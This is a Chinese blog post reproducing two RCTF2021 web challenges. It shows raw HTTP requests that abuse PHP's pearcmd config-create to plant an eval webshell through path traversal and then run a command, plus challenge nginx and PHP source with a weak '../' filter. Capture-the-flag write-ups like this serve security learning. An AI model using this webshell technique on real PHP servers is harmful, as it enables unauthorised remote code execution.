

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link href="https://fonts.proxy.ustclug.org/css2?family=Noto+Serif+SC&display=swap" rel="stylesheet">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/1avatar.png">
  <link rel="icon" href="/img/1avatar.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="D3n13d">
  <meta name="keywords" content="Web,CTF,渗透测试">
  
    <meta name="description" content="RCTF2021复现来源：https:&#x2F;&#x2F;github.com&#x2F;ccreater222&#x2F;my-ctf-challenges&#x2F;tree&#x2F;master&#x2F;RCTF2021&#x2F; VerySafe虽然但是，复现有点恶心，环境啥也没有，不得不去看wp 123git clone https:&#x2F;&#x2F;github.com&#x2F;ccreater222&#x2F;my-ctf-challenges.gitcd &#x2F;my-ctf-chall">
<meta property="og:type" content="article">
<meta property="og:title" content="RCTF2021部分复现">
<meta property="og:url" content="https://d3n13d.github.io/2022/01/08/RCTF2021%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="D3n13d &#39;s blog">
<meta property="og:description" content="RCTF2021复现来源：https:&#x2F;&#x2F;github.com&#x2F;ccreater222&#x2F;my-ctf-challenges&#x2F;tree&#x2F;master&#x2F;RCTF2021&#x2F; VerySafe虽然但是，复现有点恶心，环境啥也没有，不得不去看wp 123git clone https:&#x2F;&#x2F;github.com&#x2F;ccreater222&#x2F;my-ctf-challenges.gitcd &#x2F;my-ctf-chall">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202201081736563.png">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202201081755960.png">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202201081809313.png">
<meta property="article:published_time" content="2022-01-08T14:32:16.000Z">
<meta property="article:modified_time" content="2022-01-30T01:58:49.564Z">
<meta property="article:author" content="D3n13d">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202201081736563.png">
  
  
  <title>RCTF2021部分复现 - D3n13d &#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/scroll.css">
<link rel="stylesheet" href="/themes/hexo-theme-fluid/source/test.css">
<link rel="stylesheet" href="/css/test.css">
<link rel="stylesheet" href="/css/code.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"d3n13d.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":2,"color":"#29d","options":{"showSpinner":true,"trickleSpeed":80}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":21256305,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"><link rel="alternate" href="/atom.xml" title="D3n13d 's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>D3n13d &#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                时间线
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友人
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/bg/tree.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="RCTF2021部分复现">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      D3n13d
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-01-08 22:32" pubdate>
        2022年1月8日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      5.2k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      21 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">RCTF2021部分复现</h1>
            
            <div class="markdown-body">
              <h1 id="RCTF2021复现"><a href="#RCTF2021复现" class="headerlink" title="RCTF2021复现"></a>RCTF2021复现</h1><p>来源：<a target="_blank" rel="noopener" href="https://github.com/ccreater222/my-ctf-challenges/tree/master/RCTF2021/">https://github.com/ccreater222/my-ctf-challenges/tree/master/RCTF2021/</a></p>
<h2 id="VerySafe"><a href="#VerySafe" class="headerlink" title="VerySafe"></a>VerySafe</h2><p>虽然但是，复现有点恶心，环境啥也没有，不得不去看wp</p>
<figure class="highlight shell"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><pre><code class="hljs shell">git clone https://github.com/ccreater222/my-ctf-challenges.git<br>cd /my-ctf-challenges/RCTF2021/VerySafe/docker/<br>docker-compose up -d<br></code></pre></td></tr></table></figure>

<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a><strong>前置知识</strong></h3><h4 id="pearcmd实现裸文件包含"><a href="#pearcmd实现裸文件包含" class="headerlink" title="pearcmd实现裸文件包含"></a>pearcmd实现裸文件包含</h4><p>利用条件：</p>
<ul>
<li>PHP 开启register_argc_argv</li>
<li>PHP以Server的形式运行</li>
</ul>
<p>pecl是PHP中用于管理扩展而使用的命令行工具，在Docker任意版本镜像中，pcel&#x2F;pear都会被默认安装，安装的路径在<code>/usr/local/lib/php</code></p>
<p>如图，在拖取下来的镜像中存在 pearcmd.php</p>
<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202201081736563.png" srcset="/img/loading.gif" lazyload alt="image-20220108173616492"></p>
<p>如果这是PHP开启了 <code>register_argc_argv</code> 这个选项，那么我们传入的参数将会被当做命令行参数 argv</p>
<blockquote>
<p>RFC3875中规定，如果query-string中不包含没有编码的&#x3D;，且请求是GET或HEAD，则query-string需要被作为命令行参数。但PHP没有严格按照RFC来处理，即使我们传入的query-string包含等号，也仍会被赋值给$_SERVER[‘argv’]</p>
</blockquote>
<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202201081755960.png" srcset="/img/loading.gif" lazyload alt="image-20220108175527866"></p>
<p>接着我们查看 <code>pearcmd.php</code> ，发现config-create参数可以帮助我们创建一个文件，且内容可控，那这个时候就可以写入一个shell</p>
<h3 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h3><p>构建</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">GET</span> /../usr/local/lib/php/peclcmd.php?+config-create+/tmp/&lt;?=eval($_POST[<span class="hljs-number">1</span>]);?&gt;/*+/tmp/qqqq.php HTTP/<span class="hljs-number">1</span>.<span class="hljs-number">1</span><br><span class="hljs-attribute">Host</span>: yourhost:<span class="hljs-number">54120</span><br><span class="hljs-attribute">Upgrade</span>-Insecure-Requests: <span class="hljs-number">1</span><br><span class="hljs-attribute">User</span>-Agent: Mozilla/<span class="hljs-number">5</span>.<span class="hljs-number">0</span> (Windows NT <span class="hljs-number">10</span>.<span class="hljs-number">0</span>; Win<span class="hljs-number">64</span>; x<span class="hljs-number">64</span>) AppleWebKit/<span class="hljs-number">537</span>.<span class="hljs-number">36</span> (KHTML, like Gecko) Chrome/<span class="hljs-number">96</span>.<span class="hljs-number">0</span>.<span class="hljs-number">4664</span>.<span class="hljs-number">45</span> Safari/<span class="hljs-number">537</span>.<span class="hljs-number">36</span> Edg/<span class="hljs-number">96</span>.<span class="hljs-number">0</span>.<span class="hljs-number">1054</span>.<span class="hljs-number">29</span><br><span class="hljs-attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span>,image/webp,image/apng,*/*;q=<span class="hljs-number">0</span>.<span class="hljs-number">8</span>,application/signed-exchange;v=b<span class="hljs-number">3</span>;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span><br><span class="hljs-attribute">Accept</span>-Encoding: gzip, deflate<br><span class="hljs-attribute">Accept</span>-Language: zh-CN,zh;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span>,en;q=<span class="hljs-number">0</span>.<span class="hljs-number">8</span>,en-GB;q=<span class="hljs-number">0</span>.<span class="hljs-number">7</span>,en-US;q=<span class="hljs-number">0</span>.<span class="hljs-number">6</span><br><span class="hljs-attribute">Connection</span>: close<br><br></code></pre></td></tr></table></figure>

<p>然后</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">POST</span> /../tmp/hello.php HTTP/<span class="hljs-number">1</span>.<span class="hljs-number">1</span><br><span class="hljs-attribute">Host</span>: yourhost:<span class="hljs-number">54120</span><br><span class="hljs-attribute">Content</span>-Length: <span class="hljs-number">22</span><br><span class="hljs-attribute">Cache</span>-Control: max-age=<span class="hljs-number">0</span><br><span class="hljs-attribute">Upgrade</span>-Insecure-Requests: <span class="hljs-number">1</span><br><span class="hljs-attribute">User</span>-Agent: Mozilla/<span class="hljs-number">5</span>.<span class="hljs-number">0</span> (Windows NT <span class="hljs-number">10</span>.<span class="hljs-number">0</span>; Win<span class="hljs-number">64</span>; x<span class="hljs-number">64</span>) AppleWebKit/<span class="hljs-number">537</span>.<span class="hljs-number">36</span> (KHTML, like Gecko) Chrome/<span class="hljs-number">96</span>.<span class="hljs-number">0</span>.<span class="hljs-number">4664</span>.<span class="hljs-number">45</span> Safari/<span class="hljs-number">537</span>.<span class="hljs-number">36</span> Edg/<span class="hljs-number">96</span>.<span class="hljs-number">0</span>.<span class="hljs-number">1054</span>.<span class="hljs-number">29</span><br><span class="hljs-attribute">Origin</span>: yourhost<br><span class="hljs-attribute">Content</span>-Type: application/x-www-form-urlencoded<br><span class="hljs-attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span>,image/webp,image/apng,*/*;q=<span class="hljs-number">0</span>.<span class="hljs-number">8</span>,application/signed-exchange;v=b<span class="hljs-number">3</span>;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span><br><span class="hljs-attribute">Referer</span>: http://yourhost/tmp/hello.php<br><span class="hljs-attribute">Accept</span>-Encoding: gzip, deflate<br><span class="hljs-attribute">Accept</span>-Language: zh-CN,zh;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span>,en;q=<span class="hljs-number">0</span>.<span class="hljs-number">8</span>,en-GB;q=<span class="hljs-number">0</span>.<span class="hljs-number">7</span>,en-US;q=<span class="hljs-number">0</span>.<span class="hljs-number">6</span><br><span class="hljs-attribute">Connection</span>: close<br><br><span class="hljs-attribute">1</span>=system(&#x27;/readflag&#x27;);<br></code></pre></td></tr></table></figure>

<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202201081809313.png" srcset="/img/loading.gif" lazyload alt="image-20220108180908218"></p>
<p>成功getFlag</p>
<p>其他可利用的参数 install，download</p>
<h2 id="Easyphp"><a href="#Easyphp" class="headerlink" title="Easyphp"></a>Easyphp</h2><p>别看了，没复现出来</p>
<p>先看看nginx.conf</p>
<p>server {<br>    listen       80;<br>    listen  [::]:80;<br>    server_name  localhost;</p>
<div class="code-wrapper"><pre><code class="hljs">#access_log  /var/log/nginx/host.access.log  main;
root   /var/www/html;
location /admin &#123;
    allow 127.0.0.1;   //admin页面只允许127.0.0.1的请求
    deny all;
&#125;
location / &#123;
    index  index.php;
    try_files $uri @phpfpm;  //看寻找的$document.uri存不存在 不存在找@phpfpm 这里$document在第二行定义为 /var/www/html
&#125;

#error_page  404              /404.html;

# redirect server error pages to the static page /50x.html
#
error_page   500 502 503 504  /50x.html;
location = /50x.html &#123;
    root   /usr/share/nginx/html;
&#125;

# proxy the PHP scripts to Apache listening on 127.0.0.1:80
#
#location ~ \.php$ &#123;
#    proxy_pass   http://127.0.0.1;
#&#125;

# pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000
#
location @phpfpm &#123;
    include        fastcgi_params;
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    fastcgi_pass   php:9000;   //fastcgi服务端口
    fastcgi_index  index.php;  //fastcgi默认的主页资源
    fastcgi_param  SCRIPT_FILENAME  $document_root/index.php;
    fastcgi_param  REQUEST_URI  $uri;   //$uri请求资源给 REQUEST_URI
&#125;

# deny access to .htaccess files, if Apache&#39;s document root
# concurs with nginx&#39;s one
#
#location ~ /\.ht &#123;
#    deny  all;
#&#125;
</code></pre></div>
<p>index.php 内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>session_start();<br><span class="hljs-keyword">require</span> <span class="hljs-string">&#x27;flight/autoload.php&#x27;</span>;<br><span class="hljs-keyword">use</span> <span class="hljs-title">flight</span>\<span class="hljs-title">Engine</span>;<br><span class="hljs-variable">$app</span> = <span class="hljs-keyword">new</span> Engine();<br><br><span class="hljs-variable">$username</span> = <span class="hljs-string">&quot;admin&quot;</span>;<br><span class="hljs-variable">$password</span> = uniqid(<span class="hljs-string">&quot;asdfsadf&quot;</span>,<span class="hljs-literal">true</span>).<span class="hljs-string">&quot;YouWillNerveKnow&quot;</span>;<span class="hljs-comment">// you will never know the password 唯一标识符</span><br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">isdanger</span>(<span class="hljs-params"><span class="hljs-variable">$v</span></span>)</span>&#123;  <span class="hljs-comment">//检测危险参数</span><br>    <span class="hljs-keyword">if</span>(is_array(<span class="hljs-variable">$v</span>))&#123;<br>        <span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$v</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$k</span>=&gt;<span class="hljs-variable">$value</span>)&#123;<br>            <span class="hljs-keyword">if</span>(isdanger(<span class="hljs-variable">$k</span>)||isdanger(<span class="hljs-variable">$value</span>))&#123;  <span class="hljs-comment">//如果传入数组 =&gt; </span><br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br>        &#125;<br>    &#125;<span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">if</span>(strpos(<span class="hljs-variable">$v</span>,<span class="hljs-string">&quot;../&quot;</span>)!==<span class="hljs-literal">false</span>)&#123;  <span class="hljs-comment">//如果存在 ../ =&gt; 危险</span><br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>&#125;<br><br><span class="hljs-variable">$app</span>-&gt;before(<span class="hljs-string">&quot;start&quot;</span>,<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-keyword">foreach</span>([<span class="hljs-variable">$_GET</span>,<span class="hljs-variable">$_POST</span>,<span class="hljs-variable">$_COOKIE</span>,<span class="hljs-variable">$_FILES</span>] <span class="hljs-keyword">as</span> <span class="hljs-variable">$value</span>)&#123;<br>        <span class="hljs-keyword">if</span>(isdanger(<span class="hljs-variable">$value</span>))&#123;<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;go away hack&quot;</span>);<br>        &#125;<br>    &#125;<br>&#125;);<br><span class="hljs-variable">$app</span>-&gt;route(<span class="hljs-string">&#x27;/*&#x27;</span>, <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-keyword">global</span> <span class="hljs-variable">$app</span>;<br>    <span class="hljs-variable">$request</span> = <span class="hljs-variable">$app</span>-&gt;request();<br>    <span class="hljs-variable">$app</span>-&gt;render(<span class="hljs-string">&quot;head&quot;</span>,[],<span class="hljs-string">&quot;head_content&quot;</span>);<br>    <span class="hljs-keyword">if</span>(stristr(<span class="hljs-variable">$request</span>-&gt;url,<span class="hljs-string">&quot;login&quot;</span>)!==<span class="hljs-literal">FALSE</span>)&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>    &#125;<span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&quot;user&quot;</span>])&#123;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>        &#125;<br>        <span class="hljs-variable">$app</span>-&gt;redirect(<span class="hljs-string">&quot;/login&quot;</span>);<br>    &#125;<br><br>    <br>&#125;);<br><br><br><span class="hljs-variable">$app</span>-&gt;route(<span class="hljs-string">&#x27;/admin&#x27;</span>, <span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-keyword">global</span> <span class="hljs-variable">$app</span>;<br>    <span class="hljs-variable">$request</span> = <span class="hljs-variable">$app</span>-&gt;request();<br>    <span class="hljs-variable">$app</span>-&gt;render(<span class="hljs-string">&quot;admin&quot;</span>,[<span class="hljs-string">&quot;data&quot;</span>=&gt;<span class="hljs-string">&quot;./&quot;</span>.<span class="hljs-variable">$request</span>-&gt;query-&gt;data],<span class="hljs-string">&quot;body_content&quot;</span>);<br>    <span class="hljs-variable">$app</span>-&gt;render(<span class="hljs-string">&quot;template&quot;</span>,[]);<br>&#125;);<br><br><span class="hljs-variable">$app</span>-&gt;route(<span class="hljs-string">&quot;GET /login&quot;</span>,<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-keyword">global</span> <span class="hljs-variable">$app</span>;<br>    <span class="hljs-variable">$request</span> = <span class="hljs-variable">$app</span>-&gt;request();<br>    <span class="hljs-variable">$app</span>-&gt;render(<span class="hljs-string">&quot;login&quot;</span>,[<span class="hljs-string">&quot;fail&quot;</span>=&gt;<span class="hljs-variable">$request</span>-&gt;query-&gt;fail],<span class="hljs-string">&quot;body_content&quot;</span>);<br>    <span class="hljs-variable">$app</span>-&gt;render(<span class="hljs-string">&quot;template&quot;</span>,[]);<br>&#125;);<br><br><span class="hljs-variable">$app</span>-&gt;route(<span class="hljs-string">&quot;POST /login&quot;</span>,<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-keyword">global</span> <span class="hljs-variable">$username</span>,<span class="hljs-variable">$password</span>,<span class="hljs-variable">$app</span>;<br>    <span class="hljs-variable">$request</span>  = <span class="hljs-variable">$app</span>-&gt;request();<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$request</span>-&gt;data-&gt;username === <span class="hljs-variable">$username</span> &amp;&amp; <span class="hljs-variable">$request</span>-&gt;data-&gt;password === <span class="hljs-variable">$password</span>)&#123;<br>        <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&quot;user&quot;</span>] = <span class="hljs-variable">$username</span>;<br>        <span class="hljs-variable">$app</span>-&gt;redirect(<span class="hljs-string">&quot;/&quot;</span>);<br>        <span class="hljs-keyword">return</span>;<br>    &#125;<br>    <span class="hljs-variable">$app</span>-&gt;redirect(<span class="hljs-string">&quot;/login?fail=1&quot;</span>);<br>&#125;);<br><br><span class="hljs-variable">$app</span>-&gt;route(<span class="hljs-string">&quot;GET /&quot;</span>,<span class="hljs-function"><span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-keyword">global</span> <span class="hljs-variable">$app</span>;<br>    <span class="hljs-variable">$app</span>-&gt;render(<span class="hljs-string">&quot;index&quot;</span>,[],<span class="hljs-string">&quot;body_content&quot;</span>);<br>    <span class="hljs-variable">$app</span>-&gt;render(<span class="hljs-string">&quot;template&quot;</span>,[]);<br>&#125;);<br><br><span class="hljs-variable">$app</span>-&gt;start();<br></code></pre></td></tr></table></figure>

<p>我就直接暴躁，不懂别人怎么做的了，也许是直接给源码了，我这里是啥也没有</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Web/">Web</a>
                    
                  </div>
                
              </div>
              <p class="note note-warning">
                <strong>本文作者: </strong><a href="/">D3n13d</a> <br>
                <strong>本文链接: </strong><a href="https://d3n13d.github.io/2022/01/08/RCTF2021%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/">https://d3n13d.github.io/2022/01/08/RCTF2021%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/</a> <br>
                <strong>版权声明: </strong>本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                   </p>
                   
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/01/09/Linux%E6%97%A5%E5%B8%B8%E5%B0%8F%E6%8A%80%E5%B7%A7/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Linux日常小技巧</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/01/07/C-%E9%80%86%E5%90%91%E7%AC%94%E8%AE%B0/">
                        <span class="hidden-mobile">C++逆向笔记</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'preferred-color-scheme';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'D3n13d/utterances');
      s.setAttribute('issue-term', 'title');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
